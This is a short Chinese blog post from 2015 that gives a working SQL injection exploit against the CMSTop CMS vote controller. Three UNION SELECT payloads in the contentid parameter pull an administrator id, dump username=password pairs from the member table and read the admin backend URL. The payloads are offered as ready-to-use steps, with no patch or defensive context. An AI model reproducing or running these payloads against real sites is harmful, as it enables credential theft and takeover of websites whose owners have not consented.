cmstop通杀注入漏洞

漏洞文件/apps/vote/controller/vote.php
app.xxx.com/?app=vote&controller=vote&action=total&contentid=1 

 

获取管理员id

 

  1. ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#

 

获取到底管理id是啥你就自己写啥

  1. ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#

 

读取后台地址

  1. ?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select url from cmstop_mymenu where 1=1 limit 0,1;#

 

posted @ 2015-10-25 17:13  小生观察室  阅读(1682)  评论(0编辑  收藏  举报